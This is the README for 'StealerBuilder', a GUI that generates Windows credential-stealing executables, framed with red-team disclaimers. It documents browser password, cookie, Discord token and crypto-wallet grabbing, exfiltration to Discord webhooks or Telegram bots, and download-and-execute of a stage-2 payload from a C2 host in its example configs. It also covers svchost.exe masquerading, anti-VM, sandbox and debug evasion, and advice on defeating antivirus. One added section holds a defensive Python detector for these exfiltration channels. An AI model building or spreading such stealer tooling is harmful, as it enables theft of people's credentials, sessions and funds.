A cross-platform Qt6-based GUI application for building Windows executables with advanced payload capabilities. Designed exclusively for authorized red team engagements and penetration testing.
Features • Installation • Usage • Documentation
CRITICAL NOTICE: This software is designed exclusively for legal, authorized security testing purposes. By downloading, compiling, or using this software, you acknowledge and agree to the following terms:
- Only use on systems you own or have explicit written permission to test
- Unauthorized use violates computer fraud laws worldwide, including:
  - Computer Fraud and Abuse Act (CFAA) - United States
  - Computer Misuse Act - United Kingdom
  - GDPR - European Union
  - Equivalent laws in other jurisdictions
- You are solely responsible for any misuse of this software
- The authors assume no liability for illegal use or damages
- Violations may result in criminal prosecution and civil penalties

- Authorized penetration testing engagements
- Red team operations with proper authorization
- Security research in controlled environments
- Educational purposes in academic settings
USE ETHICALLY. USE RESPONSIBLY. USE LEGALLY.
- Features
- Prerequisites
- Installation
- Usage
- Configuration Examples
- Architecture
- Development
- Security Considerations
- Troubleshooting
- Contributing
- Resources
| Component | Minimum Version | Purpose |
|---|---|---|
| CMake | 3.16+ | Build system |
| Qt | 6.0+ | GUI framework |
| C++ Compiler | C++17 support | Code compilation |
| MinGW-w64 (Linux) | Latest | Cross-compilation to Windows |
| MSVC/MinGW (Windows) | 2019+ | Native Windows compilation |
Ubuntu/Debian
```bash
# Update package list
sudo apt-get update
# Install Qt6 and build tools
sudo apt-get install -y \
    build-essential \
    cmake \
    qt6-base-dev \
    qt6-base-dev-tools
# Install MinGW for cross-compilation
sudo apt-get install -y mingw-w64
# [Optional] Install UPX for executable packing
sudo apt-get install -y upx-ucl
```
Fedora/RHEL/CentOS
```bash
# Install Qt6 and build tools
sudo dnf install -y \
    gcc-c++ \
    cmake \
    qt6-qtbase-devel
# Install MinGW for cross-compilation
sudo dnf install -y \
    mingw64-gcc \
    mingw64-gcc-c++
# [Optional] Install UPX for executable packing
sudo dnf install -y upx
```
Arch Linux
```bash
# Install Qt6 and build tools
sudo pacman -S \
    base-devel \
    cmake \
    qt6-base
# Install MinGW for cross-compilation
sudo pacman -S mingw-w64-gcc
# [Optional] Install UPX for executable packing
sudo pacman -S upx
```
Windows
Required:
1. CMake (3.16+)
   - Download from cmake.org/download
   - Add to PATH during installation
2. Qt6
   - Download the installer from qt.io/download-qt-installer
   - Select Qt 6.x for your compiler during installation
3. C++ Compiler (choose one):
   - Visual Studio 2019+
     - Install the "Desktop development with C++" workload
     - Download from visualstudio.microsoft.com
   - MinGW-w64
     - Download from mingw-w64.org
     - Add to PATH
Optional:
4. UPX (for packing)
   - Download from upx.github.io
   - Extract and add to PATH
The automated build scripts handle everything, including font downloads:
Linux
```bash
chmod +x build.sh
./build.sh
```
The executable will be at:
Windows
```bat
build.bat
```
The executable will be at:
Linux (Manual Build)
```bash
# Download fonts first
cd fonts && ./download_fonts.sh && cd ..
# Create build directory
mkdir -p build && cd build
# Generate build files
cmake ..
# Compile
make -j$(nproc)
# Run the application
./bin/StealerBuilder
```
Windows - Visual Studio (Manual Build)
```powershell
# Download fonts first
cd fonts
.\download_fonts.bat
cd ..
# Create build directory
mkdir build
cd build
# Generate Visual Studio solution
cmake .. -G "Visual Studio 16 2019"
# Build (choose one):
# Option 1: Command line
cmake --build . --config Release
# Option 2: Open Visual Studio
start StealerBuilder.sln
# Run the application
bin\Release\StealerBuilder.exe
```
Windows - MinGW (Manual Build)
```powershell
# Download fonts first
cd fonts
.\download_fonts.bat
cd ..
# Create build directory
mkdir build
cd build
# Generate MinGW Makefiles
cmake .. -G "MinGW Makefiles"
# Build
cmake --build .
# Run the application
bin\StealerBuilder.exe
```
Run the built application:
```bash
./StealerBuilder      # Linux
StealerBuilder.exe    # Windows
```
Navigate through the tabbed interface to configure your payload:
Downloader Tab
Configure file download and execution:
- URL: Enter the payload download URL
- Save Path: Specify the destination (supports environment variables: `%TEMP%`, `%APPDATA%`, `%USERPROFILE%`)
- Execution Parameters: Add command-line arguments for the downloaded file
Grabber Tab
Select data sources to extract:
- Browsers: Chrome, Firefox, Edge, Brave (passwords, cookies, history)
- Messaging: Discord tokens, Telegram sessions
- Crypto Wallets: Exodus, Atomic, Electrum
Exfiltration Tab
Choose your data exfiltration method:
- Discord Webhook: `https://discord.com/api/webhooks/{id}/{token}`
- HTTP POST: Custom endpoint URL
- Telegram Bot: Bot token + Chat ID
Screenshots Tab
Configure capture options:
- Desktop Screenshot: Capture the current screen
- Webcam Capture: Capture from a connected camera (if available)
System Info Tab
Select system information to collect:
- Hardware ID (HWID)
- Public IP address
- Operating system version
- Installed antivirus software
- Running processes
- System specifications
Stealth Tab
Configure stealth features:
- Hide Console: Run without a visible window (recommended)
- Process Name: Spoof the process name for disguise
- Mutex: Ensure single-instance execution
- Self-Destruct: Delete after execution (optional)
Anti-Analysis Tab
Enable detection evasion:
- Anti-VM: Detect virtual machine environments
- Anti-Sandbox: Detect automated analysis systems
- Anti-Debug: Detect debugger attachment
- Sleep Evasion: Bypass time-based sandbox detection
Build Options Tab
Configure build settings:
- Output Filename: Name of the generated executable
- Architecture: Select `x86` (32-bit) or `x64` (64-bit)
- String Obfuscation: Enable XOR encoding of strings
- UPX Packing: Compress the executable (requires UPX installed)
- Custom Icon: Embed a custom icon file (optional)
- Compiler Selection: Auto-detect or manually select the compiler
Click the "Build Executable" button. The build process:
- Validates configuration settings
- Generates C++ source code with the configured features
- Compiles using the selected compiler (MinGW/MSVC)
- Optionally packs with UPX compression
- Outputs the final Windows PE executable

- Save Config: Export settings to a JSON file for reuse
- Load Config: Import a previously saved configuration
- Example Config: See the configuration examples below
```json
{
  "downloader": {
    "url": "https://example.com/payload.exe",
    "savePath": "%TEMP%\\update.exe",
    "execParams": "/silent"
  },
  "stealth": {
    "hideConsole": true,
    "mutex": "MyApp_SingleInstance"
  },
  "buildOptions": {
    "architecture": "x64",
    "obfuscate": true
  }
}
```
Use Case: Download and execute a payload silently with stealth features.
```json
{
  "grabber": {
    "chrome": true,
    "firefox": true,
    "edge": true,
    "brave": true,
    "discord": true
  },
  "exfiltration": {
    "webhook": "https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN"
  },
  "systemInfo": {
    "hwid": true,
    "ip": true,
    "os": true,
    "av": true
  },
  "stealth": {
    "hideConsole": true
  },
  "antiAnalysis": {
    "vm": true,
    "sandbox": true,
    "debug": true
  },
  "buildOptions": {
    "architecture": "x64",
    "obfuscate": true,
    "upx": true
  }
}
```
Use Case: Extract browser credentials and system info with full anti-analysis protection.
```json
{
  "downloader": {
    "url": "https://c2.example.com/stage2.exe",
    "savePath": "%APPDATA%\\Microsoft\\update.exe",
    "execParams": "--silent --no-gui"
  },
  "grabber": {
    "chrome": true,
    "firefox": true,
    "discord": true,
    "telegram": true,
    "wallets": ["exodus", "atomic", "electrum"]
  },
  "exfiltration": {
    "telegram": {
      "token": "YOUR_BOT_TOKEN",
      "chatId": "YOUR_CHAT_ID"
    }
  },
  "screenshots": {
    "desktop": true
  },
  "systemInfo": {
    "hwid": true,
    "ip": true,
    "os": true,
    "av": true,
    "processes": true
  },
  "stealth": {
    "hideConsole": true,
    "processName": "svchost.exe",
    "mutex": "Global\\MyMutex",
    "selfDestruct": false
  },
  "antiAnalysis": {
    "vm": true,
    "sandbox": true,
    "debug": true,
    "sleepEvasion": true
  },
  "buildOptions": {
    "architecture": "x64",
    "obfuscate": true,
    "upx": true,
    "icon": "path/to/custom.ico"
  }
}
```
Use Case: Full-featured red team payload with anti-analysis and comprehensive data gathering.
The builder automatically detects and uses MinGW-w64 for cross-compilation on Linux:
| Component | Value |
|---|---|
| Compiler | x86_64-w64-mingw32-g++ (x64) / i686-w64-mingw32-g++ (x86) |
| Output Format | Windows PE executable |
| Linking | Static (no DLL dependencies) |
| Runtime | Statically linked libgcc/libstdc++ |
Since the generated payloads are Windows PE files, the testing options are:
Recommended: Windows VM (VirtualBox, VMware, QEMU)
- Isolated environment
- Full Windows API support
- Snapshot/rollback capabilities

- Partial Windows API compatibility
- May not work with all features
- Not recommended for production testing
"No compiler found" Error
Cause: The required compiler is not installed or not in PATH
Solution:
- Linux: Install MinGW-w64
```bash
sudo apt-get install mingw-w64                 # Ubuntu/Debian
sudo dnf install mingw64-gcc mingw64-gcc-c++   # Fedora
sudo pacman -S mingw-w64-gcc                   # Arch
```
- Windows: Install Visual Studio 2019+ or MinGW-w64
- Ensure the compiler is added to the system PATH
- Restart the application after installation
Compilation Errors
Common Issues:
1. Outdated Compiler
   - Requires GCC 7+ or MSVC 2019+
   - Check the version: `g++ --version` or `cl /?`
2. Missing Windows SDK (Windows only)
   - Install Visual Studio with "Desktop development with C++"
   - Or install the Windows SDK separately
3. UPX Packing Fails
   - Try building without UPX first
   - Ensure UPX is installed and in PATH
   - Check the UPX version: `upx --version`
Debug Steps:
```bash
# Check compiler availability
x86_64-w64-mingw32-g++ --version   # Linux
g++ --version                      # Windows MinGW
cl /?                              # Windows MSVC
# Try a minimal build without extras
# Disable: UPX packing, obfuscation, custom icon
```
Generated Executable Doesn't Run
Expected Behavior:
Antivirus/Windows Defender may flag the executable
- This varies based on configuration and evasion settings
Solutions:
1. Antivirus Interference
   - Add an exclusion in Windows Defender if needed
   - Test in an isolated VM for controlled testing
   - Configure evasion techniques for better stealth
2. Architecture Mismatch
   - Verify the target system architecture
   - x86 executables run on x64 Windows
   - x64 executables only run on x64 Windows
3. Missing Dependencies
   - Ensure static linking is enabled
   - Check the build logs for linking errors
Testing Environment:
- Use a clean Windows 10/11 VM
- Take a snapshot before testing
- Monitor with Process Monitor (Procmon)
Exfiltration Not Working
Webhook Issues:
1. Invalid Webhook URL
   - Verify the URL format: `https://discord.com/api/webhooks/{id}/{token}`
   - Test the webhook manually:
   ```bash
   curl -X POST <webhook_url> -H "Content-Type: application/json" -d '{"content":"test"}'
   ```
2. Network Connectivity
   - Check that the target has internet access
   - Verify the firewall isn't blocking outbound HTTPS
   - Try a different exfiltration method (HTTP POST vs Discord vs Telegram)
3. Certificate Issues
   - Ensure a valid SSL certificate on the endpoint
   - Use HTTPS (not HTTP) for webhooks
Telegram Bot Issues:
- Verify the bot token is valid
- Ensure the chat ID is correct (use @userinfobot to get the ID)
- The bot must have started a conversation with the user
Qt Application Issues
Application Won't Start:
- Ensure Qt6 is properly installed
- Check that `LD_LIBRARY_PATH` includes the Qt libs (Linux)
- Verify all fonts were downloaded successfully
Font Rendering Issues:
- Run the font download script manually:
```bash
cd fonts && ./download_fonts.sh && cd ..
```
- Rebuild the application after the font download
```
StealerBuilder (GUI)
├── MainWindow: Tabbed configuration interface
├── CompilerManager: Detect and manage compilers
├── StubGenerator: Generate C++ source from config
├── Builder: Invoke compiler with proper flags
└── Config: Load/save JSON configurations
```
```
stub.exe (Windows PE)
├── Anti-Analysis: VM/sandbox/debug detection
├── Downloader: URLDownloadToFile + ShellExecute
├── Browser Grabber: SQLite + DPAPI decryption
├── System Info: WinAPI system information
├── Screenshots: GDI+ screen capture
└── Exfiltration: WinHTTP POST to webhook/endpoint
```
```
stealer-gui/
├── CMakeLists.txt            # CMake build configuration
├── README.md                 # This documentation
├── ARCHITECTURE.md           # Detailed architecture docs
├── LICENSE                   # License file
├── example_config.json       # Example configuration
│
├── build.sh                  # Linux build script
├── build.bat                 # Windows build script
├── resources.qrc             # Qt resource file (fonts, icons)
│
├── src/                      # Source code
│   ├── main.cpp              # Application entry point
│   │
│   ├── ui/                   # User interface
│   │   ├── mainwindow.h
│   │   └── mainwindow.cpp    # Main window & tabs
│   │
│   ├── config/               # Configuration
│   │   ├── config.h
│   │   └── config.cpp        # JSON serialization
│   │
│   ├── generator/            # Code generation
│   │   ├── stubgenerator.h
│   │   └── stubgenerator.cpp # C++ stub generation
│   │
│   └── compiler/             # Compiler management
│       ├── compilermanager.h
│       ├── compilermanager.cpp
│       ├── builder.h
│       └── builder.cpp
│
├── fonts/                    # Embedded fonts
│   ├── download_fonts.sh
│   ├── download_fonts.bat
│   └── *.ttf                 # Liberation fonts
│
└── build/                    # Build output (generated)
    └── bin/
        └── StealerBuilder    # Compiled executable
```
| Component | Technology | Purpose |
|---|---|---|
| GUI Framework | Qt 6 | Cross-platform interface |
| Build System | CMake 3.16+ | Build orchestration |
| Language | C++17 | Application logic |
| Serialization | JSON | Configuration storage |
| Target Output | C++/WinAPI | Generated payloads |
Step-by-Step Guide
1. Update Configuration Schema (`src/config/config.h`)
```cpp
struct Config {
    // Existing fields...
    // Add new feature configuration
    bool enableNewFeature;
    std::string newFeatureSetting;
};
```
2. Add UI Controls (`src/ui/mainwindow.cpp`)
```cpp
// In MainWindow constructor or tab creation
QCheckBox* newFeatureCheckbox = new QCheckBox("Enable New Feature");
QLineEdit* newFeatureInput = new QLineEdit();
// Add to layout
layout->addWidget(newFeatureCheckbox);
layout->addWidget(newFeatureInput);
// Connect signals
connect(newFeatureCheckbox, &QCheckBox::stateChanged,
        this, &MainWindow::onNewFeatureChanged);
```
3. Implement Code Generation (`src/generator/stubgenerator.cpp`)
```cpp
QString StubGenerator::generate(const Config& config) {
    QString sourceCode;
    // Add includes if needed
    if (config.enableNewFeature) {
        sourceCode += "#include <new_header.h>\n";
    }
    // Add implementation
    if (config.enableNewFeature) {
        sourceCode += R"(
void newFeatureFunction() {
    // Feature implementation
}
)";
    }
    return sourceCode;
}
```
4. Update JSON Serialization (`src/config/config.cpp`)
```cpp
// Save
QJsonObject Config::toJson() const {
    QJsonObject json;
    json["enableNewFeature"] = enableNewFeature;
    json["newFeatureSetting"] = QString::fromStdString(newFeatureSetting);
    return json;
}
// Load
void Config::fromJson(const QJsonObject& json) {
    enableNewFeature = json["enableNewFeature"].toBool();
    newFeatureSetting = json["newFeatureSetting"].toString().toStdString();
}
```
5. Rebuild & Test
```bash
cd build
cmake --build .
./bin/StealerBuilder   # Test your changes
```
The project uses CMake with the following key features:
- Qt6 Integration: Automatic MOC, UIC, RCC processing
- Resource Embedding: Fonts and icons embedded via `resources.qrc`
- Cross-Platform: Supports Linux, Windows (MSVC/MinGW)
- Static Linking: Generated payloads have no external dependencies
This tool generates executables that may be detected by security solutions:
| Security Solution | Detection Method | Likelihood |
|---|---|---|
| Windows Defender | Signature + Behavioral | Medium |
| Commercial AV | Signature + Heuristic | Medium |
| EDR Systems | Behavioral Analysis | Medium |
| Sandboxes | Dynamic Analysis | Low-Medium |
| Network IDS/IPS | Traffic Patterns | Low |
Note: Detection rates vary based on configuration and target environment. The tool includes evasion techniques but is designed for authorized testing scenarios.
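From the defender's side of the table above, the following is an added example and not part of this project: a small Python detector run over constructed telemetry records (process name, image path, requested URL) that flags the two exfiltration channels this README describes and a process using a spoofed system name. The Discord webhook URL shape (`/api/webhooks/{id}/{token}`) and the `svchost.exe` process name come from this page; the `api.telegram.org/bot<token>/` URL shape is the public Telegram Bot API format and is assumed here, since the page only mentions "bot token + chat ID".

```python
import re
from dataclasses import dataclass

# Constructed telemetry for this example (not captured data). One event per line:
# process_name|image_path|requested_url
SAMPLE_EVENTS = """\
svchost.exe|C:\\Windows\\System32\\svchost.exe|https://settings-win.data.microsoft.com/settings
svchost.exe|C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe|https://discord.com/api/webhooks/123456789012345678/AbCdEf-GhIjKlMn0123456789
update.exe|C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\update.exe|https://api.telegram.org/bot123456:ABCDEF-ghijkl/sendDocument
chrome.exe|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|https://discord.com/api/v9/users/@me
"""

# Discord webhook URL shape from the Exfiltration Tab: /api/webhooks/{id}/{token}.
# Ordinary Discord client traffic (/api/v9/...) does not match, which keeps the rule
# quiet on workstations where the Discord app is legitimately installed.
WEBHOOK_RE = re.compile(r"^https://(?:[a-z]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I)
# Telegram Bot API shape (public Bot API format, assumed here): api.telegram.org/bot<token>/<method>
TELEGRAM_BOT_RE = re.compile(r"^https://api\.telegram\.org/bot\d+:[\w-]+/\w+", re.I)

# Process names a payload may spoof (svchost.exe is the name used in the example config
# above) and the only directories the genuine binaries live in.
SYSTEM_PROCESS_NAMES = {"svchost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass(frozen=True)
class Finding:
    process: str
    image_path: str
    reason: str


def analyze_event(line: str) -> list[Finding]:
    """Return zero or more findings for one process|image_path|url record."""
    process, image_path, url = line.split("|", 2)
    findings = []
    if WEBHOOK_RE.match(url):
        findings.append(Finding(process, image_path, "discord-webhook-post"))
    if TELEGRAM_BOT_RE.match(url):
        findings.append(Finding(process, image_path, "telegram-bot-api"))
    # A system process name whose image is not under a system directory is a masquerade
    # signal on its own, independent of where the process connects.
    if process.lower() in SYSTEM_PROCESS_NAMES and not image_path.lower().startswith(SYSTEM_DIRS):
        findings.append(Finding(process, image_path, "system-name-outside-system-dir"))
    return findings


def analyze(log: str) -> list[Finding]:
    """Run analyze_event over every non-empty line of a telemetry dump."""
    return [f for line in log.splitlines() if line.strip() for f in analyze_event(line)]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"{finding.reason:32} {finding.process:12} {finding.image_path}")
```

Webhook posts are also made by legitimate automation, so in production the URL match should be correlated with the originating process and image path rather than alerted on alone.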
The tool includes various evasion features for red team scenarios:
Included Techniques
1. String Obfuscation
   - XOR encoding of sensitive strings
   - Runtime decryption
   - Effectiveness: Moderate
2. Anti-Debugging
   - `IsDebuggerPresent()` checks
   - Remote debugger detection
   - Effectiveness: Moderate
3. Anti-VM Detection
   - Registry key checks
   - CPUID instruction analysis
   - Effectiveness: Good
4. Anti-Sandbox
   - Sleep evasion techniques
   - Timing checks
   - Effectiveness: Moderate
5. Stealth Features
   - Hidden console window
   - Process name spoofing
   - Effectiveness: Good
Note: These techniques are designed for red team engagements and may help bypass basic security controls in controlled testing environments.
We welcome contributions that improve this educational red team tool!
1. Fork the Repository
2. Create a Feature Branch
```bash
git checkout -b feature/your-feature-name
```
3. Make Your Changes
   - Follow the existing code style
   - Add comments where needed
   - Update the documentation
4. Test Thoroughly
   - Build on Linux and Windows (if possible)
   - Test the generated executables
5. Submit a Pull Request
   - Describe your changes clearly
   - Reference any related issues
   - Explain the testing performed
This project is provided for educational and authorized security testing purposes only.
By using this software, you acknowledge and agree:
- To use it only for legal, authorized purposes
- That you are solely responsible for any misuse
- That the authors assume no liability for damages or illegal use
See LICENSE file for full details.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
THE AUTHORS ARE NOT RESPONSIBLE FOR ANY MISUSE, DAMAGE, OR ILLEGAL ACTIVITY
CAUSED BY THIS PROGRAM.
USE AT YOUR OWN RISK.
| Authorized Use | Prohibited Use |
|---|---|
| Penetration testing with written authorization | Unauthorized computer access |
| Red team engagements for clients | Stealing credentials without permission |
| Security research in labs | Deploying on production systems without consent |
| Educational purposes in academic settings | Commercial malware development |
| Testing detection capabilities | Any illegal activity |
- MITRE ATT&CK Framework - Adversary tactics and techniques
- OWASP Testing Guide - Web application security testing
- Red Team Field Manual - Red team reference guide
- PTES Technical Guidelines - Penetration testing methodology
- Metasploit Framework - Penetration testing framework
- Cobalt Strike - Adversary simulation platform
- Atomic Red Team - Test security controls
- Sysinternals Suite - Windows analysis tools
- Offensive Security - OSCP, OSEP certifications
- IppSec YouTube - HackTheBox walkthroughs
- HackTheBox - Penetration testing labs
- TryHackMe - Guided cybersecurity training
| Issue Type | Solution |
|---|---|
| Compilation Errors | Check the Troubleshooting section |
| Qt/CMake Issues | Verify the installation via Prerequisites |
| Compiler Detection | Ensure MinGW-w64/MSVC is in PATH |
| Feature Requests | Open an issue on the repository |
| Bug Reports | Open an issue with reproduction steps |
| Security Concerns | Report privately to the maintainers |
- Issues: Use GitHub Issues for bug reports and feature requests
- Discussions: For questions and general discussion
- Pull Requests: For code contributions